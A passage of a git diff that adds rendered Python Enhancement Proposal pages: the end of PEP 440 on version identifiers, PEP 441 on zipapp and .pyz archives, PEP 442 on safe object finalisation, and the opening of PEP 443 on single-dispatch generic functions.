Changing the version scheme

+

One key change in the version scheme in this PEP relative to that in +PEP 386 is to sort top level developmental releases like X.Y.devN ahead +of alpha releases like X.Ya1. This is a far more logical sort order, as +projects already using both development releases and alphas/betas/release +candidates do not want their developmental releases sorted in +between their release candidates and their final releases. There is no +rationale for using dev releases in that position rather than +merely creating additional release candidates.

+

The updated sort order also means the sorting of dev versions is now +consistent between the metadata standard and the pre-existing behaviour +of pkg_resources (and hence the behaviour of current installation +tools).

+

Making this change should make it easier for affected existing projects to +migrate to the latest version of the metadata standard.

+

Another change to the version scheme is to allow single number +versions, similar to those used by non-Python projects like Mozilla +Firefox, Google Chrome and the Fedora Linux distribution. This is actually +expected to be more useful for version specifiers, but it is easier to +allow it for both version specifiers and release numbers, rather than +splitting the two definitions.

+

The exclusion of leading and trailing whitespace was made explicit after +a couple of projects with version identifiers differing only in a +trailing \n character were found on PyPI.

+

Various other normalisation rules were also added as described in the +separate section on version normalisation below.

+

Appendix A shows detailed results of an analysis of PyPI distribution +version information, as collected on 8th August, 2014. This analysis +compares the behavior of the explicitly ordered version scheme defined in +this PEP with the de facto standard defined by the behavior of setuptools. +These metrics are useful, as the intent of this PEP is to follow existing +setuptools behavior as closely as is feasible, while still throwing +exceptions for unorderable versions (rather than trying to guess an +appropriate order as setuptools does).

+
+
+

A more opinionated description of the versioning scheme

+

As in PEP 386, the primary focus is on codifying existing practices to make +them more amenable to automation, rather than demanding that existing +projects make non-trivial changes to their workflow. However, the +standard scheme allows significantly more flexibility than is needed +for the vast majority of simple Python packages (which often don’t even +need maintenance releases - many users are happy with needing to upgrade to a +new feature release to get bug fixes).

+

For the benefit of novice developers, and for experienced developers +wishing to better understand the various use cases, the specification +now goes into much greater detail on the components of the defined +version scheme, including examples of how each component may be used +in practice.

+

The PEP also explicitly guides developers in the direction of +semantic versioning (without requiring it), and discourages the use of +several aspects of the full versioning scheme that have largely been +included in order to cover esoteric corner cases in the practices of +existing projects and in repackaging software for Linux distributions.

+
+
+

Describing version specifiers alongside the versioning scheme

+

The main reason to even have a standardised version scheme in the first place +is to make it easier to do reliable automated dependency analysis. It makes +more sense to describe the primary use case for version identifiers alongside +their definition.

+
+
+

Changing the interpretation of version specifiers

+

The previous interpretation of version specifiers made it very easy to +accidentally download a pre-release version of a dependency. This in +turn made it difficult for developers to publish pre-release versions +of software to the Python Package Index, as even marking the package as +hidden wasn’t enough to keep automated tools from downloading it, and also +made it harder for users to obtain the test release manually through the +main PyPI web interface.

+

The previous interpretation also excluded post-releases from some version +specifiers for no adequately justified reason.

+

The updated interpretation is intended to make it difficult to accidentally +accept a pre-release version as satisfying a dependency, while still +allowing pre-release versions to be retrieved automatically when that’s the +only way to satisfy a dependency.

+

The “some forward compatibility assumed” version constraint is derived from the +Ruby community’s “pessimistic version constraint” operator [2] to allow +projects to take a cautious approach to forward compatibility promises, while +still easily setting a minimum required version for their dependencies. The +spelling of the compatible release clause (~=) is inspired by the Ruby +(~>) and PHP (~) equivalents.

+

Further improvements are also planned to the handling of parallel +installation of multiple versions of the same library, but these will +depend on updates to the installation database definition along with +improved tools for dynamic path manipulation.

+

The trailing wildcard syntax to request prefix based version matching was +added to make it possible to sensibly define compatible release clauses.

+
+
+

Support for date based version identifiers

+

Excluding date based versions caused significant problems in migrating +pytz to the new metadata standards. It also caused concerns for the +OpenStack developers, as they use a date based versioning scheme and would +like to be able to migrate to the new metadata standards without changing +it.

+
+
+

Adding version epochs

+

Version epochs are added for the same reason they are part of other +versioning schemes, such as those of the Fedora and Debian Linux +distributions: to allow projects to gracefully change their approach to +numbering releases, without having a new release appear to have a lower +version number than previous releases and without having to change the name +of the project.

+

In particular, supporting version epochs allows a project that was previously +using date based versioning to switch to semantic versioning by specifying +a new version epoch.

+

The ! character was chosen to delimit an epoch version rather than the +: character, which is commonly used in other systems, due to the fact that +: is not a valid character in a Windows directory name.

+
+
+

Adding direct references

+

Direct references are added as an “escape clause” to handle messy real +world situations that don’t map neatly to the standard distribution model. +This includes dependencies on unpublished software for internal use, as well +as handling the more complex compatibility issues that may arise when +wrapping third party libraries as C extensions (this is of especial concern +to the scientific community).

+

Index servers are deliberately given a lot of freedom to disallow direct +references, since they’re intended primarily as a tool for integrators +rather than publishers. PyPI in particular is currently going through the +process of eliminating dependencies on external references, as unreliable +external services have the effect of slowing down installation operations, +as well as reducing PyPI’s own apparent reliability.

+
+
+

Adding arbitrary equality

+

Arbitrary equality is added as an “escape clause” to handle the case where +someone needs to install a project which uses a non compliant version. Although +this PEP is able to attain ~97% compatibility with the versions that are +already on PyPI there are still ~3% of versions which cannot be parsed. This +operator gives a simple and effective way to still depend on them without +having to “guess” at the semantics of what they mean (which would be required +if anything other than strict string based equality was supported).

+
+
+

Adding local version identifiers

+

It’s a fact of life that downstream integrators often need to backport +upstream bug fixes to older versions. It’s one of the services that gets +Linux distro vendors paid, and application developers may also apply patches +they need to bundled dependencies.

+

Historically, this practice has been invisible to cross-platform language +specific distribution tools - the reported “version” in the upstream +metadata is the same as for the unmodified code. This inaccuracy can then +cause problems when attempting to work with a mixture of integrator +provided code and unmodified upstream code, or even just attempting to +identify exactly which version of the software is installed.

+

The introduction of local version identifiers and “local version labels” +into the versioning scheme, with the corresponding python.integrator +metadata extension allows this kind of activity to be represented +accurately, which should improve interoperability between the upstream +tools and various integrated platforms.

+

The exact scheme chosen is largely modeled on the existing behavior of +pkg_resources.parse_version and pkg_resources.parse_requirements, +with the main distinction being that where pkg_resources currently always +takes the suffix into account when comparing versions for exact matches, +the PEP requires that the local version label of the candidate version be +ignored when no local version label is present in the version specifier +clause. Furthermore, the PEP does not attempt to impose any structure on +the local version labels (aside from limiting the set of permitted +characters and defining their ordering).

+

This change is designed to ensure that an integrator provided version like +pip 1.5+1 or pip 1.5+1.git.abc123de will still satisfy a version +specifier like pip>=1.5.

+

The plus is chosen primarily for readability of local version identifiers. +It was chosen instead of the hyphen to prevent +pkg_resources.parse_version from parsing it as a prerelease, which is +important for enabling a successful migration to the new, more structured, +versioning scheme. The plus was chosen instead of a tilde because of the +significance of the tilde in Debian’s version ordering algorithm.

+
+
+

Providing explicit version normalization rules

+

Historically, the de facto standard for parsing versions in Python has been the +pkg_resources.parse_version command from the setuptools project. This does +not attempt to reject any version and instead tries to make something +meaningful, with varying levels of success, out of whatever it is given. It has +a few simple rules but otherwise it more or less relies largely on string +comparison.

+

The normalization rules provided in this PEP exist primarily to either increase the compatibility with pkg_resources.parse_version, particularly in documented use cases such as rev, r, pre, etc., or to do something more reasonable with versions that already exist on PyPI.

+

All possible normalization rules were weighed against whether or not they were likely to cause any ambiguity (e.g. while someone might devise a scheme where v1.0 and 1.0 are considered distinct releases, the likelihood of anyone actually doing that, much less on any scale that is noticeable, is fairly low). They were also weighed against how pkg_resources.parse_version treated a particular version string, especially with regards to how it was sorted. Finally, each rule was weighed against the kinds of additional versions it allowed, how “ugly” those versions looked, how hard they were to parse (both mentally and mechanically) and how much additional compatibility it would bring.

+

The breadth of possible normalizations was kept to things that could easily be implemented as part of the parsing of the version and not pre-parsing transformations applied to the versions. This was done to limit the side effects of each transformation, as simple search and replace style transforms increase the likelihood of ambiguous or “junk” versions.

+

For an extended discussion on the various types of normalizations that were +considered, please see the proof of concept for PEP 440 within pip [5].

+
+
+

Allowing Underscore in Normalization

+

There are not a lot of projects on PyPI which utilize a _ in the version string. However, this PEP allows its use anywhere that - is acceptable. The reason for this is that the Wheel normalization scheme specifies that - gets normalized to a _ to enable easier parsing of the filename.

+
+
+
+

Summary of changes to PEP 440

+

The following changes were made to this PEP based on feedback received after +the initial reference implementation was released in setuptools 8.0 and pip +6.0:

+
    +
  • The exclusive ordered comparisons were updated to no longer imply a !=V.*, which was deemed surprising behavior that was too hard to accurately describe. Instead the exclusive ordered comparisons will simply disallow matching pre-releases, post-releases, and local versions of the specified version (unless the specified version is itself a pre-release, post-release or local version). For an extended discussion see the threads on distutils-sig [6] [7].
  • +
  • The normalized form for release candidates was updated from ‘c’ to ‘rc’. +This change was based on user feedback received when setuptools 8.0 +started applying normalisation to the release metadata generated when +preparing packages for publication on PyPI [8].
  • +
  • The PEP text and the is_canonical regex were updated to be explicit +that numeric components are specifically required to be represented as +sequences of ASCII digits, not arbitrary Unicode [Nd] code points. This +was previously implied by the version parsing regex in Appendix B, but +not stated explicitly [10].
  • +
+
+
+

References

+

The initial attempt at a standardised version scheme, along with the +justifications for needing such a standard can be found in PEP 386.

+ + +
+
+

Appendix A

+

Metadata v2.0 guidelines versus setuptools:

+
$ invoke check.pep440
+Total Version Compatibility:              245806/250521 (98.12%)
+Total Sorting Compatibility (Unfiltered): 45441/47114 (96.45%)
+Total Sorting Compatibility (Filtered):   47057/47114 (99.88%)
+Projects with No Compatible Versions:     498/47114 (1.06%)
+Projects with Differing Latest Version:   688/47114 (1.46%)
+
+
+
+
+

Appendix B : Parsing version strings with regular expressions

+

As noted earlier in the Public version identifiers section, published +version identifiers SHOULD use the canonical format. This section provides +regular expressions that can be used to test whether a version is already +in that form, and if it’s not, extract the various components for subsequent +normalization.

+

To test whether a version identifier is in the canonical format, you can use +the following function:

+
import re
+def is_canonical(version):
+    return re.match(r'^([1-9][0-9]*!)?(0|[1-9][0-9]*)(\.(0|[1-9][0-9]*))*((a|b|rc)(0|[1-9][0-9]*))?(\.post(0|[1-9][0-9]*))?(\.dev(0|[1-9][0-9]*))?$', version) is not None
+
+
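For example, the function accepts canonical forms and rejects anything that still needs normalization:

assert is_canonical("1!1.0.dev456")
assert not is_canonical("1.1RC1")           # needs case and spelling normalization
assert not is_canonical("1.0+downstream1")  # the regex covers public versions only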
+

To extract the components of a version identifier, use the following regular +expression (as defined by the packaging +project):

+
VERSION_PATTERN = r"""
+    v?
+    (?:
+        (?:(?P<epoch>[0-9]+)!)?                           # epoch
+        (?P<release>[0-9]+(?:\.[0-9]+)*)                  # release segment
+        (?P<pre>                                          # pre-release
+            [-_\.]?
+            (?P<pre_l>alpha|a|beta|b|preview|pre|c|rc)
+            [-_\.]?
+            (?P<pre_n>[0-9]+)?
+        )?
+        (?P<post>                                         # post release
+            (?:-(?P<post_n1>[0-9]+))
+            |
+            (?:
+                [-_\.]?
+                (?P<post_l>post|rev|r)
+                [-_\.]?
+                (?P<post_n2>[0-9]+)?
+            )
+        )?
+        (?P<dev>                                          # dev release
+            [-_\.]?
+            (?P<dev_l>dev)
+            [-_\.]?
+            (?P<dev_n>[0-9]+)?
+        )?
+    )
+    (?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))?       # local version
+"""
+
+_regex = re.compile(
+    r"^\s*" + VERSION_PATTERN + r"\s*$",
+    re.VERBOSE | re.IGNORECASE,
+)
+
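For instance, matching a fully loaded version string and inspecting the named groups (reusing the import re and _regex from the block above):

match = _regex.match("v1.0b2.post345.dev456+abc.5")
assert match is not None
print(match.group("release"), match.group("pre"), match.group("local"))
# prints: 1.0 b2 abc.5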
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0440.rst

+

Last modified: 2024-11-24 08:20:53 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0441/index.html b/pep-0441/index.html new file mode 100644 index 00000000000..75155954eff --- /dev/null +++ b/pep-0441/index.html @@ -0,0 +1,479 @@ + + + + + + + + PEP 441 – Improving Python ZIP Application Support | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 441 – Improving Python ZIP Application Support

+
+
Author:
+
Daniel Holth <dholth at gmail.com>, +Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Python-Dev message
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2013
+
Python-Version:
+
3.5
+
Post-History:
+
30-Mar-2013, 01-Apr-2013, 16-Feb-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Improving Python ZIP Application Support

+

Python has had the ability to execute directories or ZIP-format +archives as scripts since version 2.6 [1]. When invoked with a zip +file or directory as its first argument the interpreter adds that +directory to sys.path and executes the __main__ module. These +archives provide a great way to publish software that needs to be +distributed as a single file script but is complex enough to need to +be written as a collection of modules.

+

This feature is not as popular as it should be, mainly because it was not promoted as part of Python 2.6 [2], so it is relatively unknown, but also because the Windows installer does not register a file extension (other than .py) for this format of file to associate with the launcher.

+

This PEP proposes to fix these problems by re-publicising the feature, +defining the .pyz and .pyzw extensions as “Python ZIP Applications” +and “Windowed Python ZIP Applications”, and providing some simple +tooling to manage the format.

+
+
+

A New Python ZIP Application Extension

+

The terminology “Python Zip Application” will be the formal term used +for a zip-format archive that contains Python code in a form that can +be directly executed by Python (specifically, it must have a +__main__.py file in the root directory of the archive). The +extension .pyz will be formally associated with such files.

+

The Python 3.5 installer will associate .pyz and .pyzw “Python +Zip Applications” with the platform launcher so they can be executed. +A .pyz archive is a console application and a .pyzw archive is a +windowed application, indicating whether the console should appear +when running the app.

+

On Unix, it would be ideal if the .pyz extension and the name +“Python Zip Application” were registered (in the mime types database?). +However, such an association is out of scope for this PEP.

+

Python Zip applications can be prefixed with a #! line +pointing to the correct Python interpreter and an optional +explanation:

+
#!/usr/bin/env python3
+#  Python application packed with zipapp module
+(binary contents of archive)
+
+
+

On Unix, this allows the OS to run the file with the correct +interpreter, via the standard “shebang” support. On Windows, the +Python launcher implements shebang support.

+

However, it is always possible to execute a .pyz application by +supplying the filename to the Python interpreter directly.

+

As background, ZIP archives are defined with a footer containing +relative offsets from the end of the file. They remain valid when +concatenated to the end of any other file. This feature is completely +standard and is how self-extracting ZIP archives and the bdist_wininst +installer format work.

+
+
+

Minimal Tooling: The zipapp Module

+

This PEP also proposes including a module for working with these +archives. The module will contain functions for working with Python +zip application archives, and a command line interface (via python +-m zipapp) for their creation and manipulation.

+

More complete tools for managing Python Zip Applications are +encouraged as 3rd party applications on PyPI. Currently, pyzzer [5] +and pex [6] are two such tools.

+
+

Module Interface

+

The zipapp module will provide the following functions:

+
+

create_archive(source, target=None, interpreter=None, main=None)

+

Create an application archive from source. The source can be any +of the following:

+
    +
  • The name of a directory, in which case a new application archive +will be created from the content of that directory.
  • +
  • The name of an existing application archive file, in which case the +file is copied to the target. The file name should include the +.pyz or .pyzw extension, if required.
  • +
  • A file object open for reading in bytes mode. The content of the +file should be an application archive, and the file object is +assumed to be positioned at the start of the archive.
  • +
+

The target argument determines where the resulting archive will be +written:

+
    +
  • If it is the name of a file, the archive will be written to that +file.
  • +
  • If it is an open file object, the archive will be written to that +file object, which must be open for writing in bytes mode.
  • +
  • If the target is omitted (or None), the source must be a directory +and the target will be a file with the same name as the source, with +a .pyz extension added.
  • +
+

The interpreter argument specifies the name of the Python +interpreter with which the archive will be executed. It is written as +a “shebang” line at the start of the archive. On Unix, this will be +interpreted by the OS, and on Windows it will be handled by the Python +launcher. Omitting the interpreter results in no shebang line being +written. If an interpreter is specified, and the target is a +filename, the executable bit of the target file will be set.

+

The main argument specifies the name of a callable which will be +used as the main program for the archive. It can only be specified if +the source is a directory, and the source does not already contain a +__main__.py file. The main argument should take the form +“pkg.module:callable” and the archive will be run by importing +“pkg.module” and executing the given callable with no arguments. It +is an error to omit main if the source is a directory and does not +contain a __main__.py file, as otherwise the resulting archive +would not be executable.

+

If a file object is specified for source or target, it is the +caller’s responsibility to close it after calling create_archive.

+

When copying an existing archive, file objects supplied only need +read and readline, or write methods. When creating an +archive from a directory, if the target is a file object it will be +passed to the zipfile.ZipFile class, and must supply the methods +needed by that class.

+
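For instance, packing a hypothetical myapp directory (assumed to contain a __main__.py) into a runnable archive might look like:

import zipapp

# Creates myapp.pyz with a shebang line; run it with "python myapp.pyz",
# or directly on Unix thanks to the shebang.
zipapp.create_archive("myapp", target="myapp.pyz",
                      interpreter="/usr/bin/env python3")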
+
+

get_interpreter(archive)

+

Returns the interpreter specified in the shebang line of the +archive. If there is no shebang, the function returns None. +The archive argument can be a filename or a file-like object open +for reading in bytes mode.

+
+
+
+

Command Line Usage

+

The zipapp module can be run with the python -m flag. The command +line interface is as follows:

+
python -m zipapp directory [options]
+
+    Create an archive from the given directory.  An archive will
+    be created from the contents of that directory.  The archive
+    will have the same name as the source directory with a .pyz
+    extension.
+
+    The following options can be specified:
+
+    -o archive / --output archive
+
+        The destination archive will have the specified name.  The
+        given name will be used as written, so should include the
+        ".pyz" or ".pyzw" extension.
+
+    -p interpreter / --python interpreter
+
+        The given interpreter will be written to the shebang line
+        of the archive.  If this option is not given, the archive
+        will have no shebang line.
+
+    -m pkg.mod:fn / --main pkg.mod:fn
+
+        The source directory must not have a __main__.py file. The
+        archiver will write a __main__.py file into the target
+        which calls fn from the module pkg.mod.
+
+
+

The behaviour of the command line interface matches that of +zipapp.create_archive().

+

In addition, it is possible to use the command line interface to work +with an existing archive:

+
python -m zipapp app.pyz --show
+
+    Displays the shebang line of an archive.  Output is of the
+    form
+
+        Interpreter: /usr/bin/env
+    or
+        Interpreter: <none>
+
+    and is intended for diagnostic use, not for scripts.
+
+python -m zipapp app.pyz -o newapp.pyz [-p interpreter]
+
+    Copy app.pyz to newapp.pyz, modifying the shebang line based
+    on the -p option (as for creating an archive, no -p option
+    means remove the shebang line).  Specifying a destination is
+    mandatory.
+
+    In-place modification of an archive is *not* supported, as the
+    risk of damaging archives is too great for a simple tool.
+
+
+

As noted, the archives are standard zip files, and so can be unpacked +using any standard ZIP utility or Python’s zipfile module. For this +reason, no interfaces to list the contents of an archive, or unpack +them, are provided or needed.

+
+
+

FAQ

+
+
Are you sure a standard ZIP utility can handle #! at the beginning?
Absolutely. The zipfile specification allows for arbitrary data to +be prepended to a zipfile. This feature is commonly used by +“self-extracting zip” programs. If your archive program can’t +handle this, it is a bug in your archive program.
+
Isn’t zipapp just a very thin wrapper over the zipfile module?
Yes. If you prefer to build your own Python zip application +archives using other tools, they will work just as well. The +zipapp module is a convenience, nothing more.
+
Why not just use a .zip or .py extension?
Users expect a .zip file to be opened with an archive tool, and +expect a .py file to contain readable text. Both would be +confusing for this use case.
+
How does this compete with existing package formats?
The sdist, bdist and wheel formats are designed for packaging of +modules to be installed into an existing Python installation. +They are not intended to be used without installing. The +executable zip format is specifically designed for standalone use, +without needing to be installed. They are in effect a multi-file +version of a standalone Python script.
+
+
+
+
+

Rejected Proposals

+
+

Convenience Values for Shebang Lines

+

Is it worth having “convenience” forms for any of the common +interpreter values? For example, -p 3 meaning the same as -p +"/usr/bin/env python3". It would save a lot of typing for the +common cases, as well as giving cross-platform options for people who +don’t want or need to understand the intricacies of shebang handling +on “other” platforms.

+

Downsides are that it’s not obvious how to translate the +abbreviations. For example, should “3” mean “/usr/bin/env python3”, +“/usr/bin/python3”, “python3”, or something else? Also, there is no +obvious short form for the key case of “/usr/bin/env python” (any +available version of Python), which could easily result in scripts +being written with overly-restrictive shebang lines.

+

Overall, this seems like there are more problems than benefits, and as +a result has been dropped from consideration.

+
+
+

Registering .pyz as a Media Type

+

It was suggested [3] that the .pyz extension should be registered +in the Unix database of extensions. While it makes sense to do this +as an equivalent of the Windows installer registering the extension, +the .py extension is not listed in the media types database [4]. +It doesn’t seem reasonable to register .pyz without .py, so +this idea has been omitted from this PEP. An interested party could +arrange for both .py and .pyz to be registered at a future +date.

+
+
+

Default Interpreter

+

The initial draft of this PEP proposed using /usr/bin/env python +as the default interpreter. Unix users have problems with this +behaviour, as the default for the python command on many distributions +is Python 2, and it is felt that this PEP should prefer Python 3 by +default. However, using a command of python3 can result in +unexpected behaviour for Windows users, where the default behaviour of +the launcher for the command python is commonly customised by users, +but the behaviour of python3 may not be modified to match.

+

As a result, the principle “in the face of ambiguity, refuse to guess” +has been invoked, and archives have no shebang line unless explicitly +requested. On Windows, the archives will still be run (with the +default Python) by the launcher, and on Unix, the archives can be run +by explicitly invoking the desired Python interpreter.

+
+
+

Command Line Tool to Manage Shebang Lines

+

It is conceivable that users would want to modify the shebang line for an existing archive, or even just display the current shebang line. This is tricky to do with existing tools (zip programs typically ignore prepended data entirely, and text editors can have trouble editing files containing binary data).

+

The zipapp module provides functions to handle the shebang line, but +does not include a command line interface to that functionality. This +is because it is not clear how to provide one without the resulting +interface being over-complex and potentially confusing. Changing the +shebang line is expected to be an uncommon requirement.

+
+
+
+

Reference Implementation

+

A reference implementation is at http://bugs.python.org/issue23491.

+
+
+

References

+ +

The discussion of this PEP took place on the python-dev mailing list, +in the thread starting at +https://mail.python.org/pipermail/python-dev/2015-February/138277.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0441.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0442/index.html b/pep-0442/index.html new file mode 100644 index 00000000000..32f2b67d4d6 --- /dev/null +++ b/pep-0442/index.html @@ -0,0 +1,391 @@ + + + + + + + + PEP 442 – Safe object finalization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 442 – Safe object finalization

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
18-May-2013
+
Python-Version:
+
3.4
+
Post-History:
+
18-May-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to deal with the current limitations of object +finalization. The goal is to be able to define and run finalizers +for any object, regardless of their position in the object graph.

+

This PEP doesn’t call for any change in Python code. Objects +with existing finalizers will benefit automatically.

+
+
+

Definitions

+
+
Reference
A directional link from an object to another. The target of the +reference is kept alive by the reference, as long as the source is +itself alive and the reference isn’t cleared.
+
Weak reference
A directional link from an object to another, which doesn’t keep +alive its target. This PEP focuses on non-weak references.
+
Reference cycle
A cyclic subgraph of directional links between objects, which keeps +those objects from being collected in a pure reference-counting +scheme.
+
Cyclic isolate (CI)
A standalone subgraph of objects in which no object is referenced +from the outside, containing one or several reference cycles, and +whose objects are still in a usable, non-broken state: they can +access each other from their respective finalizers.
+
Cyclic garbage collector (GC)
A device able to detect cyclic isolates and turn them into cyclic +trash. Objects in cyclic trash are eventually disposed of by +the natural effect of the references being cleared and their +reference counts dropping to zero.
+
Cyclic trash (CT)
A former cyclic isolate whose objects have started being cleared +by the GC. Objects in cyclic trash are potential zombies; if they +are accessed by Python code, the symptoms can vary from weird +AttributeErrors to crashes.
+
Zombie / broken object
An object that is part of cyclic trash. The term stresses that the object is not safe: its outgoing references may have been cleared, or one of the objects it references may be a zombie. Therefore, it should not be accessed by arbitrary code (such as finalizers).
+
Finalizer
A function or method called when an object is intended to be +disposed of. The finalizer can access the object and release any +resource held by the object (for example mutexes or file +descriptors). An example is a __del__ method.
+
Resurrection
The process by which a finalizer creates a new reference to an +object in a CI. This can happen as a quirky but supported +side-effect of __del__ methods.
+
+
+
+

Impact

+

While this PEP discusses CPython-specific implementation details, the +change in finalization semantics is expected to affect the Python +ecosystem as a whole. In particular, this PEP obsoletes the current +guideline that “objects with a __del__ method should not be part of a +reference cycle”.

+
+
+

Benefits

+

The primary benefits of this PEP regard objects with finalizers, such +as objects with a __del__ method and generators with a finally +block. Those objects can now be reclaimed when they are part of a +reference cycle.
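For instance, under the new semantics a cycle such as the following (the Node class is illustrative) has its finalizers run and its memory reclaimed, where previously the objects would have been moved to gc.garbage:

import gc

class Node:
    def __del__(self):
        print("finalized")

a, b = Node(), Node()
a.partner, b.partner = b, a   # create a two-object reference cycle
del a, b
gc.collect()                  # prints "finalized" twice; before this
                              # PEP the cycle was uncollectable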

+

The PEP also paves the way for further benefits:

+
    +
  • The module shutdown procedure may not need to set global variables to None anymore. This could solve a well-known class of irritating issues.
+

The PEP doesn’t change the semantics of:

+
    +
  • Weak references caught in reference cycles.
  • C extension types with a custom tp_dealloc function.
+
+
+

Description

+
+

Reference-counted disposal

+

In normal reference-counted disposal, an object’s finalizer is called +just before the object is deallocated. If the finalizer resurrects +the object, deallocation is aborted.

+

However, if the object was already finalized, then the finalizer isn’t +called. This prevents us from finalizing zombies (see below).

+
+
+

Disposal of cyclic isolates

+

Cyclic isolates are first detected by the garbage collector, and then +disposed of. The detection phase doesn’t change and won’t be described +here. Disposal of a CI traditionally works in the following order:

+
    +
  1. Weakrefs to CI objects are cleared, and their callbacks called. At this point, the objects are still safe to use.
  2. The CI becomes a CT as the GC systematically breaks all known references inside it (using the tp_clear function).
  3. Nothing. All CT objects should have been disposed of in step 2 (as a side-effect of clearing references); this collection is finished.
+

This PEP proposes to turn CI disposal into the following sequence (new +steps are in bold):

+
    +
  1. Weakrefs to CI objects are cleared, and their callbacks called. At this point, the objects are still safe to use.
  2. The finalizers of all CI objects are called. (new)
  3. The CI is traversed again to determine if it is still isolated. If it is determined that at least one object in CI is now reachable from outside the CI, this collection is aborted and the whole CI is resurrected. Otherwise, proceed. (new)
  4. The CI becomes a CT as the GC systematically breaks all known references inside it (using the tp_clear function).
  5. Nothing. All CT objects should have been disposed of in step 4 (as a side-effect of clearing references); this collection is finished.
+
+

Note

+

The GC doesn’t recalculate the CI after step 2 above, hence the need +for step 3 to check that the whole subgraph is still isolated.

+
+
+
+
+

C-level changes

+

Type objects get a new tp_finalize slot to which __del__ methods +are mapped (and reciprocally). Generators are modified to use this slot, +rather than tp_del. A tp_finalize function is a normal C +function which will be called with a valid and alive PyObject as its +only argument. It doesn’t need to manipulate the object’s reference count, +as this will be done by the caller. However, it must ensure that the +original exception state is restored before returning to the caller.

+

For compatibility, tp_del is kept in the type structure. Handling +of objects with a non-NULL tp_del is unchanged: when part of a CI, +they are not finalized and end up in gc.garbage. However, a non-NULL +tp_del is not encountered anymore in the CPython source tree (except +for testing purposes).

+

Two new C API functions are provided to ease calling of tp_finalize, +especially from custom deallocators.

+

On the internal side, a bit is reserved in the GC header for GC-managed +objects to signal that they were finalized. This helps avoid finalizing +an object twice (and, especially, finalizing a CT object after it was +broken by the GC).

+
+

Note

+

Objects which are not GC-enabled can also have a tp_finalize slot. +They don’t need the additional bit since their tp_finalize function +can only be called from the deallocator: it therefore cannot be called +twice, except when resurrected.

+
+
+
+

Discussion

+
+

Predictability

+

Following this scheme, an object’s finalizer is always called exactly +once, even if it was resurrected afterwards.
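A short sketch of this guarantee (the Once class is illustrative):

class Once:
    def __del__(self):
        print("finalized")
        global keeper
        keeper = self    # resurrect by creating a new reference

obj = Once()
del obj      # prints "finalized"; the object survives via 'keeper'
del keeper   # reclaimed silently: the finalizer does not run again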

+

For CI objects, the order in which finalizers are called (step 2 above) +is undefined.

+
+
+

Safety

+

It is important to explain why the proposed change is safe. There +are two aspects to be discussed:

+
    +
  • Can a finalizer access zombie objects (including the object being finalized)?
  • What happens if a finalizer mutates the object graph so as to impact the CI?
+

Let’s discuss the first issue. We will divide possible cases in two +categories:

+
    +
  • If the object being finalized is part of the CI: by construction, no objects in CI are zombies yet, since CI finalizers are called before any reference breaking is done. Therefore, the finalizer cannot access zombie objects, which don’t exist.
  • If the object being finalized is not part of the CI/CT: by definition, objects in the CI/CT don’t have any references pointing to them from outside the CI/CT. Therefore, the finalizer cannot reach any zombie object (that is, even if the object being finalized was itself referenced from a zombie object).
+

Now for the second issue. There are three potential cases:

+
    +
  • The finalizer clears an existing reference to a CI object. The CI object may be disposed of before the GC tries to break it, which is fine (the GC simply has to be aware of this possibility).
  • The finalizer creates a new reference to a CI object. This can only happen from a CI object’s finalizer (see above why). Therefore, the new reference will be detected by the GC after all CI finalizers are called (step 3 above), and collection will be aborted without any objects being broken.
  • The finalizer clears or creates a reference to a non-CI object. By construction, this is not a problem.
+
+
+
+

Implementation

+

An implementation is available in branch finalize of the repository +at http://hg.python.org/features/finalize/.

+
+
+

Validation

+

Besides running the normal Python test suite, the implementation adds +test cases for various finalization possibilities including reference cycles, +object resurrection and legacy tp_del slots.

+

The implementation has also been checked to not produce any regressions on +the following test suites:

+ +
+
+

References

+

Notes about reference cycle collection and weak reference callbacks: +http://hg.python.org/cpython/file/4e687d53b645/Modules/gc_weakref.txt

+

Generator memory leak: http://bugs.python.org/issue17468

+

Allow objects to decide if they can be collected by GC: +http://bugs.python.org/issue9141

+

Module shutdown procedure based on GC +http://bugs.python.org/issue812369

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0442.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0443/index.html b/pep-0443/index.html new file mode 100644 index 00000000000..6a95880d201 --- /dev/null +++ b/pep-0443/index.html @@ -0,0 +1,519 @@ + + + + + + + + PEP 443 – Single-dispatch generic functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 443 – Single-dispatch generic functions

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
22-May-2013
+
Python-Version:
+
3.4
+
Post-History:
+
22-May-2013, 25-May-2013, 31-May-2013
+
Replaces:
+
245, 246, 3124
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new mechanism in the functools standard library +module that provides a simple form of generic programming known as +single-dispatch generic functions.

+

A generic function is composed of multiple functions implementing +the same operation for different types. Which implementation should be +used during a call is determined by the dispatch algorithm. When the +implementation is chosen based on the type of a single argument, this is +known as single dispatch.

+
+
+

